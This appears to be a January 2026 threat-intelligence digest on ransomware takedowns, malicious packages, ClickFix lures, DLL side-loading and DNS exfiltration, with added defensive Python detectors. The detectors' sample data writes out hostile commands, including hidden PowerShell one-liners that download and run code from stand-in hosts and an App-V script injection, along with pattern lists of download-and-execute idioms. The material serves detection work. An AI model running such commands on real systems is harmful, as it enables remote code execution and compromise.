Cyware Monthly Threat Intelligence, January 2026

The Good
Cybersecurity had a rare win streak this month. The FBI and DOJ shut down RAMP, a notorious dark web forum for ransomware activity, permanently disrupting a key hub for criminal collaboration. Google followed up by dismantling IPIDEA, a major residential proxy network abused by multiple nation-state and cybercrime groups, significantly shrinking their attack infrastructure. Moreover, the FBI launched Operation Winter SHIELD, offering clear, actionable guidance to help organizations strengthen IT and OT defenses and reduce exploitation risks.
The FBI has successfully taken down the Russian Anonymous Marketplace (RAMP), a notorious dark web forum known for facilitating ransomware discussions and services. This operation, conducted in collaboration with the US Attorney’s Office and the Department of Justice, resulted in RAMP's websites being replaced with law enforcement seizure notices. Established in 2012, RAMP became a significant hub for low-to-mid-tier ransomware groups, particularly after other forums banned ransomware discussions. Its administrator, Stallman, confirmed the takedown and stated there are no plans to rebuild the platform.
Google, in collaboration with industry partners, has disrupted IPIDEA, one of the largest residential proxy networks globally, which facilitated cybercrime and espionage. The effort combined legal action, including court orders to shut down malicious domains, with technical countermeasures. Google Play Protect now warns users about applications that bundle IPIDEA's SDKs and blocks their installation on Play Protect certified devices. The network has been linked to numerous botnets and was used by threat actors tied to China, North Korea (DPRK), Iran, and Russia for activity including password spraying and access to software-as-a-service environments. The disruption significantly reduced the pool of available proxy devices, degrading affiliated services that relied on the shared infrastructure.
The FBI launched Operation Winter SHIELD, a campaign outlining ten cybersecurity actions for organizations to protect IT and OT environments. The campaign aims to enhance resilience by identifying adversary focus areas and providing actionable steps to reduce exploitation risks. The initiative aligns with the US National Cyber Strategy and FBI Cyber Strategy, running for ten weeks with detailed recommendations. Recommendations include adopting phish-resistant authentication, managing third-party risks, protecting security logs, maintaining offline backups, and strengthening email protections.
Cybersecurity researchers have discovered two malicious packages on PyPI, named `spellcheckerpy` and `spellcheckpy`, designed to deliver a RAT. The packages, downloaded over 1,000 times, carried a base64-encoded payload hidden inside a Basque-language dictionary file. Early versions were dormant; version 1.2.0 activated the malicious code on import. The RAT downloader fingerprints the compromised host and retrieves and executes commands from an external domain associated with a hosting provider known for servicing nation-state actors. The incident is not isolated: earlier fake spell-checking tools have been found on PyPI, suggesting a consistent threat actor. Separately, several malicious npm packages have emerged that target cryptocurrency wallets and run phishing campaigns against specific industries in various countries.
The EU has proposed significant updates to its Cybersecurity Act, referred to as "Cybersecurity Act 2.0," to enhance cybersecurity across the bloc. This revision addresses previous criticisms regarding the act's voluntary nature and slow certification processes. Key changes include the introduction of a trusted ICT supply chain security framework, mandatory derisking of telecom networks from high-risk suppliers, and streamlined certification schemes that must be developed within 12 months. Additionally, ENISA will see an expansion of its role, gaining more authority and resources to lead responses to major cyber incidents and support businesses. The new act aims to ensure better protection of critical ICT supply chains and strengthen the EU's overall cybersecurity posture.
The DHS is finalizing plans for a new council named ANCHOR (Alliance of National Councils for Homeland Operational Resilience) to replace the disbanded Critical Infrastructure Partnership Advisory Council (CIPAC). ANCHOR aims to enhance communication between government and industry regarding critical infrastructure security, addressing ongoing threats, particularly from cyber attacks. Unlike CIPAC, which was burdened by bureaucratic processes, ANCHOR seeks to facilitate broader discussions without rigid charter requirements.
The Bad
Threat actors are getting bolder, increasingly abusing trusted platforms, social engineering, and resilient malware infrastructure to carry out stealthy, high-impact attacks. A fake VS Code extension, ClawdBot Agent, is posing as a legitimate AI coding assistant to silently deploy malware and remote access tools on Windows systems. At the same time, researchers uncovered a spyware campaign in Pakistan using a fake dating app, GhostChat, to steal sensitive data and hijack WhatsApp accounts, while a multi-stage phishing operation in Russia is delivering Amnesia RAT and ransomware through deceptive documents and cloud-hosted payloads.
A recently discovered fake VS Code extension named ClawdBot Agent poses as a legitimate AI coding assistant while secretly deploying malware on Windows systems. This malicious extension activates automatically upon starting VS Code, downloading and executing harmful files without user interaction. The attackers cleverly used the name of the popular Clawdbot to exploit brand recognition, creating a polished interface and integrating with multiple AI providers. The extension's code includes a hidden payload delivery mechanism, relying on a command-and-control server to fetch additional malicious components. Notably, it installs a weaponized version of ScreenConnect, allowing remote access to infected machines. The sophisticated design features multiple layers of redundancy, ensuring the malware remains functional even if primary servers are taken down.
ESET researchers have identified a sophisticated spyware campaign in Pakistan that uses a fake dating app called GhostChat to lure victims. Posing as a chat platform, the app features locked female profiles and requires users to enter hardcoded access codes, creating an illusion of exclusivity. Once installed, GhostChat covertly monitors device activity and exfiltrates sensitive data, including contacts and documents. The campaign is linked to broader espionage activities, including ClickFix attacks that compromise victims’ computers and a WhatsApp hijacking technique called GhostPairing, which allows attackers to access users' chat histories. This coordinated effort employs social engineering tactics and impersonates governmental organizations to distribute malware.
A Vietnam-based cybercrime group is using AI to enhance its phishing campaigns, primarily distributing the PureRAT malware. The attacks typically begin with phishing emails disguised as job offers that lead victims to download malicious files hosted on cloud services such as Dropbox. Once opened, the files start an infection chain that installs PureRAT or other payloads, such as a hidden VNC (HVNC) module. The attackers employ AI-generated scripts with detailed comments in Vietnamese that walk through each malicious action. The scripts create hidden directories, rename files, and establish persistence on compromised systems by adding autostart entries in the Windows registry.
North Korean hacking group Konni has been observed using AI-generated PowerShell malware to target blockchain developers in Japan, Australia, and India. This phishing campaign, known as Operation Poseidon, exploits social engineering techniques, employing malicious emails disguised as financial notices to trick recipients into downloading harmful ZIP files. These files contain a Windows shortcut that executes an embedded PowerShell loader, leading to the deployment of a backdoor known as EndRAT. The malware is designed to evade detection and establish persistence on infected systems, allowing attackers to gain broader access to development environments.
A multi-stage phishing campaign has been identified targeting users in Russia, utilizing ransomware and Amnesia RAT. The attack begins with social engineering tactics, presenting seemingly benign business documents that distract victims while malicious activities occur in the background. The campaign effectively employs public cloud services for payload distribution, complicating detection and takedown efforts. Malicious scripts are delivered through compressed archives containing deceptive documents and Windows shortcuts, which, when executed, initiate a series of PowerShell commands to download additional payloads. The final stages include deploying Amnesia RAT for extensive data theft and a ransomware variant that encrypts files and manipulates cryptocurrency transactions.
North Korean hackers associated with the Contagious Interview campaign are targeting developers by using malicious Microsoft VS Code projects to deliver backdoor malware. This tactic involves instructing victims to clone repositories from platforms like GitHub and launch them in VS Code, where embedded malicious payloads are executed through task configuration files. The malware, disguised as benign files such as spell-check dictionaries, utilizes obfuscated JavaScript to establish communication with remote servers, enabling remote code execution and persistent access. Attackers specifically target software engineers in cryptocurrency and fintech sectors to gain access to sensitive information and digital assets. Additionally, the campaign has evolved to include various delivery methods, such as malicious npm dependencies and advanced modules for keylogging and cryptocurrency mining.
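The repository-based delivery described above relies on VS Code running a task as soon as the folder is opened. The following is an added example, not code from the Cyware digest or from any vendor, of a pre-open check a developer or CI job can run over a freshly cloned repository. It assumes the documented VS Code convention that a task auto-runs when its `runOptions.runOn` is `folderOpen`, and that tasks live in `.vscode/tasks.json`; the suspicious-token list and the sample tasks file are constructed for this example.

```python
# Added example (not from the digest or any vendor tooling): scan a cloned repository
# for VS Code tasks that run automatically on folder open, the trigger described in
# the Contagious Interview lures. Assumptions: tasks live in <repo>/.vscode/tasks.json
# and auto-run when "runOptions": {"runOn": "folderOpen"} is set (VS Code's documented
# field). The SUSPICIOUS token list is a starting point, not a complete signature.
import json
import os
import re

SUSPICIOUS = re.compile(
    r"(curl|wget|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression|base64|bash -c|"
    r"powershell|cmd /c|node -e|python -c|\.dic\b)",
    re.IGNORECASE,
)

def strip_jsonc(text: str) -> str:
    """tasks.json is JSONC: drop line comments and trailing commas before parsing."""
    text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    return re.sub(r",\s*([}\]])", r"\1", text)

def find_autorun_tasks(tasks_json_text: str) -> list[dict]:
    """Return every task VS Code would start on folder open, with a risk flag."""
    data = json.loads(strip_jsonc(tasks_json_text))
    findings = []
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        command = " ".join(
            [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        )
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "type": task.get("type"),
            "command": command,
            "suspicious": bool(SUSPICIOUS.search(command)),
        })
    return findings

def scan_repo(repo_dir: str) -> list[dict]:
    """Convenience wrapper: scan <repo_dir>/.vscode/tasks.json if it exists."""
    path = os.path.join(repo_dir, ".vscode", "tasks.json")
    if not os.path.exists(path):
        return []
    with open(path, encoding="utf-8") as fh:
        return find_autorun_tasks(fh.read())

# Constructed sample mirroring the pattern in the text: a "build" task that really
# runs node on a file disguised as a spell-check dictionary.
SAMPLE_TASKS_JSON = r'''{
  // auto-generated
  "version": "2.0.0",
  "tasks": [
    {
      "label": "npm: build",
      "type": "shell",
      "command": "node",
      "args": ["./assets/en-US.dic"],
      "runOptions": { "runOn": "folderOpen" },
    },
    {
      "label": "test",
      "type": "shell",
      "command": "npm test",
    }
  ]
}'''

if __name__ == "__main__":
    for f in find_autorun_tasks(SAMPLE_TASKS_JSON):
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{flag}] {f['label']} ({f['type']}): {f['command']}")
```

Run `scan_repo(path)` before opening an untrusted clone; any folderOpen task deserves a look regardless of the flag, since the token list only catches obvious download-and-run idioms. VS Code's own Workspace Trust prompt covers the same vector, but only if the user does not click through it.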
A malicious ad-blocker extension called NexShield has been discovered targeting Chrome and Edge users through a malvertising campaign. The extension creates a denial-of-service condition by opening connections without bound, causing the browser to crash or hang. After the browser restarts, NexShield shows a deceptive pop-up warning of security issues and instructs the user to run commands in the Windows command prompt. Those commands launch an obfuscated PowerShell script that downloads a remote access tool known as ModeloRAT, which can carry out a range of malicious actions inside corporate environments. Researchers attribute this evolving threat to a group named KongTuke, which has increasingly focused on enterprise networks since early 2025.
The Russia-linked group tracked as Void Blizzard is deploying PLUGGYAPE malware against Ukrainian defense forces via Signal and WhatsApp, distributed through fake charity links. The malware is written in Python and uses WebSocket and MQTT for communication, with C2 addresses updated dynamically via external paste services. The attackers use legitimate Ukrainian accounts and personalized lures to build credibility. Related campaigns against Ukrainian targets include phishing emails delivering a Go-based stealer (FILEMESS), the OrcaC2 framework, and the LaZagne password recovery tool, as well as spear-phishing against Ukrainian institutions that uses malicious ZIP archives and LNK files.
Cisco has addressed a critical vulnerability, tracked as CVE-2025-20393, affecting its Secure Email Gateway and Secure Email and Web Manager products. This security flaw, disclosed in December 2025, was exploited by a China-linked threat group known as UAT-9686, allowing attackers to execute arbitrary commands with root privileges on compromised appliances. The vulnerability stemmed from insufficient validation of HTTP requests, enabling unauthenticated remote attackers to manipulate affected systems. Cisco reported that the exploitation had been ongoing since at least November 2025, with threat actors deploying the AquaShell backdoor and other malicious tools.
New Threats
Threat activity continues to escalate across platforms and geographies. A new Android malware campaign is abusing Hugging Face to host and distribute thousands of malicious APKs, luring users with a fake security app before deploying a remote access trojan that steals financial credentials via accessibility abuse. Meanwhile, initial access broker TA584 has expanded its ransomware operations by adopting Tsundere Bot and XWorm RAT, using evasive email-based attack chains and blockchain-backed C2 infrastructure to scale attacks beyond North America and the U.K. Rounding out the threat landscape, a new malware-as-a-service called Stanley is enabling cybercriminals to publish malicious Chrome extensions that bypass review checks and deliver highly convincing phishing attacks directly through the browser.
A new Android malware campaign has exploited the Hugging Face platform to distribute over 6,000 variants of malicious APKs designed to steal credentials from financial services. The attack begins with victims installing a dropper app called TrustBastion, which falsely claims to enhance device security. After installation, the app prompts users to update, redirecting them to a Hugging Face dataset repository to download the actual malware. This malware acts as a remote access tool, leveraging Android’s Accessibility Services to capture user activity, display fake login interfaces for services like Alipay and WeChat, and exfiltrate sensitive data to its operators.
A prolific initial access broker known as TA584 has recently adopted the Tsundere Bot alongside the XWorm RAT to facilitate ransomware attacks. Active since 2020, TA584 has significantly increased its operations, employing a sophisticated attack chain that evades static detection methods. The Tsundere Bot, attributed to a Russian-speaking operator and linked to the 123 Stealer malware, can gather information, exfiltrate data, and install additional payloads. This attack chain begins with emails from compromised accounts, leading targets through a series of redirects and CAPTCHA pages to execute a PowerShell command that loads the malware. TA584's activity has expanded beyond North America and the U.K to include Germany and Australia, indicating a broader targeting strategy. The malware operates as a service, utilizing the Ethereum blockchain for C2 communication and featuring capabilities to profile infected systems and execute arbitrary code.
A new MaaS named Stanley has emerged, enabling the creation of malicious Chrome extensions that can bypass Google's review process and be published on the Chrome Web Store. Advertised by a seller using the alias Stanley, this service facilitates phishing attacks by overlaying full-screen iframes with deceptive content while keeping the browser's address bar unchanged to maintain the illusion of legitimacy. Stanley offers silent auto-installation for browsers like Chrome, Edge, and Brave, along with various subscription tiers, including a Luxe Plan that provides a web panel for managing the malicious extensions. Additionally, the service allows operators to enable hijacking rules and send notifications to victims, enhancing the phishing process.
A new malicious campaign utilizes the ClickFix method alongside fake CAPTCHA prompts and signed Microsoft App-V scripts to distribute the Amatera info-stealer. The attack initiates with a fake CAPTCHA that instructs victims to manually execute a command through the Windows Run dialog, exploiting the legitimate SyncAppvPublishingServer.vbs script to launch PowerShell. This execution verifies user interaction and thwarts automated analysis by stalling in sandbox environments. Subsequently, the malware retrieves configuration data from a public Google Calendar file and uses steganography to conceal payloads within PNG images hosted on public CDNs. The final stage involves decrypting and executing native shellcode to activate the Amatera infostealer, which connects to a hardcoded IP address to collect browser data and credentials from infected systems, operating as MaaS.
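Both the NexShield pop-up and the fake-CAPTCHA chain above end with a user pasting a command into the Run dialog or a command prompt, which gives a consistent process-tree signal: explorer.exe (or a cmd.exe it spawned) starting a script host or PowerShell with a download-and-run one-liner. The block below is an added example, not from the digest or any vendor product, of a detector over process-creation events in the shape of Sysmon Event ID 1 (parent image, image, command line). The events are constructed, the field names are this example's own, and the App-V rule relies on the documented behaviour that SyncAppvPublishingServer.vbs hands its argument to PowerShell, so a `;` in that argument injects further commands.

```python
# Added example (not from the digest or any vendor): flag ClickFix-style execution
# in process-creation telemetry. ProcEvent mirrors the Sysmon Event ID 1 fields
# ParentImage / Image / CommandLine; the sample events below are constructed.
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str

# Interpreters a victim is typically told to paste commands into via Win+R or cmd.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# SyncAppvPublishingServer.vbs passes its argument into PowerShell, so a ';' inside
# the quoted argument injects arbitrary commands (e.g. n; iwr ... ; iex ...).
APPV_ABUSE = re.compile(r'SyncAppvPublishingServer\.vbs"?\s+"?[^"]*;', re.IGNORECASE)

# Download-and-run idioms that recur in pasted one-liners.
DOWNLOAD_RUN = re.compile(
    r"\b(iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring)\b"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|https?://",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the ClickFix indicators an event matches (empty if none)."""
    hits = []
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    if APPV_ABUSE.search(cmd):
        hits.append("appv_script_injection")
    if parent == "explorer.exe" and image in SHELLS and DOWNLOAD_RUN.search(cmd):
        hits.append("run_dialog_download_exec")
    if parent == "cmd.exe" and image in {"powershell.exe", "pwsh.exe"} and DOWNLOAD_RUN.search(cmd):
        hits.append("cmd_prompt_to_powershell_download")
    return hits

# Constructed events: two malicious chains and two benign ones.
SAMPLE_EVENTS = [
    # Win+R -> "SyncAppvPublishingServer.vbs" with an injected PowerShell payload.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" '
              r'"n; iwr http://captcha.invalid/c.png -OutFile $env:TEMP\c.png; iex ($env:TEMP)"'),
    # Victim pastes into an open command prompt (NexShield-style instruction).
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell -w hidden -ep bypass -c "iex (iwr http://update.invalid/s)"'),
    # Benign: user opens PowerShell from the Start menu.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    # Benign: scheduled script run from a batch file.
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\backup.ps1"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or "clean", "<-", ev.command_line[:70])
```

For retroactive hunting on a single host, the same pasted commands are usually still recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which is worth collecting alongside the process telemetry.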
A new phishing campaign has emerged that uses LinkedIn messages to distribute a RAT through DLL sideloading. The operators target high-value individuals with messages that build trust and then encourage them to download a malicious WinRAR self-extracting archive. The archive contains a legitimate PDF reader application alongside a malicious DLL that is sideloaded when the application runs. The attack installs a Python interpreter and executes Base64-encoded shellcode in memory, giving persistent remote access to the compromised system. Because the lure arrives over LinkedIn rather than email, it sidesteps security controls that are focused on the mail channel.
A new strain of malware known as PDFSider has been deployed in ransomware attacks against a Fortune 100 company in the finance sector. Attackers utilized social engineering tactics, impersonating technical support to trick employees into installing Microsoft’s Quick Assist tool. PDFSider is delivered via spearphishing emails containing a legitimate executable for the PDF24 Creator, alongside a malicious DLL that is loaded through DLL side-loading. This method allows the malware to bypass security systems effectively. PDFSider operates stealthily, with minimal disk artifacts, and exfiltrates system information over DNS. It employs AES-256-GCM encryption for secure communication, making it more akin to espionage tools than typical financially motivated malware, and includes anti-analysis features to evade detection in sandbox environments.
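Exfiltration over DNS, as described for PDFSider, leaves a statistical footprint in resolver logs even when the tunnel's encoding is unknown: one registrable domain receives a large number of distinct, long, high-entropy subdomains. The block below is an added example, not from the digest or the PDFSider analysis, that scores query logs for that pattern. It assumes a constructed "<client> <qname>" line format, and it treats the last two labels as the registrable domain, which is a simplification (a public-suffix list is needed for co.uk-style domains); the thresholds are starting points, not tuned values.

```python
# Added example (not from the digest or any vendor): score DNS query logs for the
# exfiltration-over-DNS pattern. Input lines are "<client> <qname>" (constructed below).
# Assumption: the last two labels are the registrable domain; the thresholds are
# illustrative defaults to tune per environment.
import hashlib
import math
from collections import defaultdict

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname: str):
    """Return (registrable_domain, subdomain_part) or (None, None) if no subdomain."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None, None
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def score_domains(lines, min_unique=20, min_len=30, min_entropy=3.5):
    """Aggregate per registrable domain and flag tunnel-like behaviour."""
    subs = defaultdict(set)
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        domain, sub = split_qname(parts[-1])
        if domain:
            subs[domain].add(sub)
    report = {}
    for domain, s in subs.items():
        avg_len = sum(len(x) for x in s) / len(s)
        avg_ent = sum(shannon_entropy(x.replace(".", "")) for x in s) / len(s)
        report[domain] = {
            "unique_subdomains": len(s),
            "avg_subdomain_len": round(avg_len, 1),
            "avg_entropy": round(avg_ent, 2),
            "suspicious": len(s) >= min_unique and avg_len >= min_len and avg_ent >= min_entropy,
        }
    return report

def constructed_log():
    """Constructed sample: ordinary lookups plus 25 hex-encoded chunks sent to one domain."""
    lines = []
    benign = ["www.example.invalid", "api.example.invalid", "cdn.example.invalid"]
    for i in range(30):
        lines.append(f"10.0.0.5 {benign[i % 3]}")
    for i in range(25):
        blob = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()   # stands in for encoded data
        lines.append(f"10.0.0.7 {blob[:32]}.{blob[32:]}.t-example.invalid")
    return lines

if __name__ == "__main__":
    for domain, stats in sorted(score_domains(constructed_log()).items()):
        print(domain, stats)
```

Low-volume tunnels that send a few queries per hour will sit under min_unique; lengthening the aggregation window, or keying on client plus domain, catches those at the cost of more review work.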
A new cyber-espionage campaign has emerged, targeting U.S. government and policy entities through Venezuela-themed spear phishing tactics to deliver the LOTUSLITE backdoor. Attributed to the Chinese state-sponsored group Mustang Panda, this campaign utilizes DLL side-loading techniques to launch its attacks. The LOTUSLITE backdoor is a custom C++ implant designed for remote command execution and data exfiltration, establishing persistence via Windows Registry modifications.
Microsoft's January 2026 security update addresses 114 vulnerabilities, including one actively exploited flaw (CVE-2026-20805) affecting the Desktop Window Manager, which could lead to unauthorized disclosure of sensitive information. Among the vulnerabilities, eight are rated Critical, with many related to privilege escalation and information disclosure. Notably, the update addresses a security feature bypass concerning Secure Boot Certificate Expiration (CVE-2026-21265) and a critical privilege escalation flaw in Windows Virtualization-Based Security (CVE-2026-20876). Microsoft also removed outdated Agere Soft Modem drivers due to a local privilege escalation flaw.
Two malicious Chrome extensions with over 900,000 combined users have been found exfiltrating the contents of OpenAI ChatGPT and DeepSeek conversations. Named "Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI" and "AI Sidebar with Deepseek, ChatGPT, Claude, and more," the extensions impersonated legitimate tools to gain user trust. Once installed, they asked users to consent to anonymized analytics collection but instead harvested full conversation data and browsing activity, sending it to remote servers every 30 minutes. The tactic, dubbed "Prompt Poaching," is a significant risk because the stolen data can be used for corporate espionage and identity theft. Legitimate extensions such as Similarweb have also been implicated in similar data collection, raising broader concerns about privacy and security in browser extensions.
A sophisticated cyberattack campaign by the Black Cat hacker group has been revealed, utilizing fake Notepad++ download websites to distribute malware and steal sensitive data. By exploiting search engine optimization techniques, these phishing sites rank prominently in search results, deceiving users into downloading malicious software. The malware employs advanced tactics, including a multi-layered execution chain and DLL side-loading, to establish persistence and evade detection. Once installed, it creates shortcuts that lead to backdoor components, enabling the theft of browser credentials, keylogging, and sensitive data exfiltration.
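DLL side-loading recurs through this month's reporting (the LinkedIn RAT, PDFSider, LOTUSLITE and the fake Notepad++ campaign): a signed, legitimate executable is dropped into a user-writable directory next to an attacker DLL that the executable loads by name. Image-load telemetry exposes that combination directly. The block below is an added example, not from the digest or any vendor, that flags side-load candidates in events shaped like Sysmon Event ID 7 (process image, loaded image, signature state). The events, the trusted-path list and the set of commonly hijacked DLL names are all constructed for this example and are incomplete by design.

```python
# Added example (not from the digest or any vendor): flag DLL side-loading candidates
# in image-load telemetry (Sysmon Event ID 7 style). Events and field names are
# constructed for this example; TRUSTED_ROOTS and HIJACK_NAMES are assumptions to
# adjust per environment.
from dataclasses import dataclass
import ntpath

@dataclass
class ImageLoad:
    image: str          # the process executable
    image_loaded: str   # the DLL that was mapped
    image_signed: bool
    dll_signed: bool

# Directories that require admin rights to write to; loads from there are out of
# scope for this check (they indicate a different, already-privileged problem).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# DLL names a signed application normally resolves from System32. An unsigned copy
# sitting beside the EXE is the classic search-order hijack. Constructed, incomplete.
HIJACK_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "userenv.dll",
                "wtsapi32.dll", "profapi.dll", "msimg32.dll"}

def norm_dir(path: str) -> str:
    """Lower-cased directory of a Windows path, with a trailing backslash."""
    return ntpath.dirname(path.replace("/", "\\")).lower() + "\\"

def is_sideload_candidate(ev: ImageLoad) -> tuple[bool, list[str]]:
    """Return (flag, reasons). Flag requires the same-directory load plus one more signal."""
    reasons = []
    exe_dir, dll_dir = norm_dir(ev.image), norm_dir(ev.image_loaded)
    dll_name = ntpath.basename(ev.image_loaded).lower()
    if exe_dir != dll_dir:
        return False, reasons            # not loaded from beside the EXE
    if exe_dir.startswith(TRUSTED_ROOTS):
        return False, reasons            # admin-writable location, out of scope
    reasons.append("dll_loaded_from_exe_dir_outside_trusted_roots")
    if ev.image_signed and not ev.dll_signed:
        reasons.append("signed_exe_unsigned_dll")
    if dll_name in HIJACK_NAMES:
        reasons.append("system_dll_name_collision")
    return len(reasons) >= 2, reasons

# Constructed events: one side-load, three benign loads.
SAMPLE_LOADS = [
    ImageLoad(r"C:\Users\bob\AppData\Local\Temp\pdfreader\reader.exe",
              r"C:\Users\bob\AppData\Local\Temp\pdfreader\version.dll",
              image_signed=True, dll_signed=False),
    ImageLoad(r"C:\Program Files\Vendor\app.exe",
              r"C:\Program Files\Vendor\plugin.dll",
              image_signed=True, dll_signed=False),
    ImageLoad(r"C:\Users\bob\Downloads\tool.exe",
              r"C:\Windows\System32\version.dll",
              image_signed=True, dll_signed=True),
    ImageLoad(r"C:\Users\bob\Downloads\tool\tool.exe",
              r"C:\Users\bob\Downloads\tool\libcurl.dll",
              image_signed=True, dll_signed=True),
]

if __name__ == "__main__":
    for ev in SAMPLE_LOADS:
        flagged, why = is_sideload_candidate(ev)
        print("SIDELOAD" if flagged else "ok", ev.image_loaded, why)
```

The signature field is the weak point: a stolen or leased code-signing certificate makes the DLL "signed", so in environments where that is a concern, compare the DLL's signer against the EXE's signer rather than only checking that a signature exists.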